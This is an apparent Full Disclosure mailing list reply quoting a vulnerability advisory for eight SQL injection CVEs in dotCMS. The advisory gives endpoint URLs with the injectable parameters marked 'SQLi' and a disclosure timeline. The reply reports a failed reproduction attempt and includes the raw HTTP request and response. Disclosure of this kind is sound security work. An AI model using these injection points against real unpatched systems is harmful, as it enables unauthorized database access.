> On Oct 31, 2016, at 2:41 PM, Elar Lang <elarlang@xxxxxxxxx> wrote: > > Title: Multiple SQL injection vulnerabilities in dotCMS (8x CVE) > Credit: Elar Lang / https://security.elarlang.eu > Vendor/Product: dotCMS (http://dotcms.com/) > Vulnerability: SQL injection > Vulnerable version: before 3.5; 3.3.1 and 3.3.2 (depends on CVE) > CVE: CVE-2016-8902, CVE-2016-8903, CVE-2016-8904, CVE-2016-8905, > CVE-2016-8906, CVE-2016-8907, CVE-2016-8908, CVE-2016-4040 > > > # Multiple SQL injections in dotCMS framework. > > > ## CVE-2016-8902 - categoriesServlet, sort > I am having trouble reproducing this one on 3.3 and 3.2.4. As an unauthenticated user on a clean install of dotCMS, I perform this request. GET /categoriesServlet?start=0&count=10&sort=asc HTTP/1.1 Host: 10.211.55.37:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: dmid=47c0772e-83aa-4741-aec6-c9cefa7155c8; JSESSIONID=8EC35440A01B976EA9A6F02D6FB6886F Accept-Encoding: gzip, deflate Connection: keep-alive Upgrade-Insecure-Requests: 1 In you blog post, you note JSON is supposed to be returned, but that doesn’t happen. The response I get is a simple 200. HTTP/1.1 200 OK Server: Apache-Coyote/1.1 SET-COOKIE: dmid=47c0772e-83aa-4741-aec6-c9cefa7155c8;Path=/ SET-COOKIE: JSESSIONID=8EC35440A01B976EA9A6F02D6FB6886F;Path=/ Cache-Control: public, no-store, no-cache, max-age=0 Pragma: no-cache Expires: Tue, 01 Nov 2016 14:55:34 GMT Content-Type: text/plain;charset=utf-8 Content-Length: 0 Date: Tue, 01 Nov 2016 14:55:34 GMT What versions exactly did you test against to reproduce this and what was the setup? I am also curious why a UNION doesn’t work (mentioned in blog post) if you dug into that. Thanks! > SQL injection vulnerability in the categoriesServlet in dotCMS before > 3.3.1 allows remote not authenticated attackers to execute arbitrary > SQL commands via the sort parameter. > > Preconditions: None. No authentication needed. > > Proof-of-Concept URL, vulnerable parameter is "sort": > /categoriesServlet?start=0&count=10&sort=SQLi > > > ## CVE-2016-8903 - "Templates pages", _EXT_13_orderby > > SQL injection vulnerability in the "Site Browser > Templates pages" > screen in dotCMS before 3.3.1 allows remote authenticated attackers to > execute arbitrary SQL commands via the _EXT_13_orderby parameter. > > Preconditions: attacker must be authenticated. > > Proof-of-Concept URL (from "Admin Site" UI: "Site Browser > Templates > pages", click on some column title in the resultset table): > /c/portal/layout?p_l_id=b7ab5d3c-5ee0-4195-a17e-8f5579d718dd&p_p_id=EXT_13&p_p_action=0&p_p_state=maximized&p_p_mode=view&_EXT_13_struts_action=%2Fext%2Ftemplates%2Fview_templates&_EXT_13_pageNumber=1&_EXT_13_orderby=SQLi > > > ## CVE-2016-8904 - "Containers pages", _EXT_12_orderby > > SQL injection vulnerability in the "Site Browser > Containers pages" > screen in dotCMS before 3.3.1 allows remote authenticated attackers to > execute arbitrary SQL commands via the _EXT_12_orderby parameter. > > Preconditions: attacker must be authenticated. > > Proof-of-Concept URL (from "Admin Site" UI: "Site Browser > Containers > pages", click on some column title in the resultset table): > /c/portal/layout?p_l_id=b7ab5d3c-5ee0-4195-a17e-8f5579d718dd&p_p_id=EXT_12&p_p_action=0&p_p_state=maximized&p_p_mode=view&_EXT_12_struts_action=%2Fext%2Fcontainers%2Fview_containers&_EXT_12_pageNumber=1&_EXT_12_orderby=SQLi > > > ## CVE-2016-8905 - JSONTags servlet, sort > > SQL injection vulnerability in the JSONTags servlet in dotCMS before > 3.3.1 allows remote authenticated attackers to execute arbitrary SQL > commands via the sort parameter. > > Preconditions: attacker must be authenticated. > > Proof-of-Concept > /JSONTags?start=0&count=10&sort=tagname SQLi > > > ## CVE-2016-8906 - "Links pages", _EXT_18_orderby > > SQL injection vulnerability in the "Site Browser > Links page" screen > in dotCMS before 3.3.1 allows remote authenticated attackers to > execute arbitrary SQL commands via the _EXT_18_orderby parameter. > > Preconditions: attacker must be authenticated. > > Proof-of-Concept URL (from "Admin Site" UI: "Site Browser > Links > pages", click on some column title in the resultset table): > /c/portal/layout?p_l_id=b7ab5d3c-5ee0-4195-a17e-8f5579d718dd&p_p_id=EXT_18&p_p_action=0&p_p_state=maximized&p_p_mode=view&_EXT_18_struts_action=%2Fext%2Flinks%2Fview_links&_EXT_18_pageNumber=1&_EXT_18_orderby=SQLi > > > ## CVE-2016-8907 - "Content Types", _EXT_STRUCTURE_orderBy and > _EXT_STRUCTURE_direction > > SQL injection vulnerability in the "Content Types > Content Types" > screen in dotCMS before 3.3.1 allows remote authenticated attackers to > execute arbitrary SQL commands via the _EXT_STRUCTURE_orderBy and > _EXT_STRUCTURE_direction parameters. > > Preconditions: attacker must be authenticated. > > Proof-of-Concept URL (from "Admin Site" UI: "Content Types > Content > Types", click on some column title in the resultset table) > /c/portal/layout?p_l_id=56fedb43-dbbf-4ce2-8b77-41fb73bad015&p_p_id=EXT_STRUCTURE&p_p_action=1&p_p_state=maximized&p_p_mode=view&_EXT_STRUCTURE_struts_action=%2Fext%2Fstructure%2Fview_structure&_EXT_STRUCTURE_orderBy=SQLi&_EXT_STRUCTURE_direction=SQLi > > > ## CVE-2016-8908 - "HTML pages", _EXT_15_orderby > > SQL injection vulnerability in the "Site Browser > HTML pages" screen > in dotCMS before 3.3.1 allows remote authenticated attackers to > execute arbitrary SQL commands via the _EXT_15_orderby parameter. > > Preconditions: attacker must be authenticated. > > Proof-of-Concept URL (from "Admin Site" UI: "Site Browser > HTML > pages", click on some column title in the resultset table): > /c/portal/layout?p_l_id=b7ab5d3c-5ee0-4195-a17e-8f5579d718dd&p_p_id=EXT_15&p_p_action=0&p_p_state=maximized&p_p_mode=view&_EXT_15_struts_action=%2Fext%2Fhtmlpages%2Fview_htmlpages&_EXT_15_orderby=modDate,SQLi&_EXT_15_pageNumber=1 > > > ## CVE-2016-4040 - "Workflow", _EXT_15_orderby > > SQL injection vulnerability in the "Workflow Screen" in dotCMS before > 3.3.2 allows remote administrators to execute arbitrary SQL commands > via the _EXT_15_orderby parameter. > > Preconditions: attacker must be authenticated. > > Proof-of-Concept URL (from "Admin Site" UI: "Home > Workflow tasks", > click on some column title in the resultset table) > /html/portlet/ext/workflows/view_tasks_list.jsp?schemeId=&assignedTo=&createdBy=&stepId=&open=false&closed=true&keywords=&orderBy=SQLi&count=1&page=1 > > > # Vulnerability Disclosure Timeline > > 2015-12-14 | me > dotCMS | 8 SQL injection vulnerabilities > 2015-12-14 | dotCMS > me | they were planning fixes in upcoming > release, estimated to beginning of 2016 > 2016-03-16 | dotCMS | dotCMS version 3.3.1 release (CVE-2016-4040 > still not fixed) > 2016-04-07 | me > dotCMS | what is the situation with reported > vulnerabilities? > 2016-04-07 | dotCMS > me | CVE-2016-4040 will be fixed in 3.5, which > is estimated to be out in mid-April > 2016-04-19 | dotCMS | dotCMS version 3.5 release > 2016-05-10 | dotCMS | dotCMS version 3.3.2 release > 2016-10-31 | me | Full Disclosure on http://security.elarlang.eu > > > # Related fixes and releases > https://dotcms.com/docs/latest/change-log#release-3.3.1 > https://dotcms.com/docs/latest/change-log#release-3.5 > https://dotcms.com/docs/latest/change-log#release-3.3.2 > > -- > Elar Lang > Blog @ https://security.elarlang.eu > Pentester, lecturer @ http://www.clarifiedsecurity.com > > _______________________________________________ > Sent through the Full Disclosure mailing list > https://nmap.org/mailman/listinfo/fulldisclosure > Web Archives & RSS: http://seclists.org/fulldisclosure/
Attachment:
signature.asc
Description: Message signed with OpenPGP using GPGMail
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/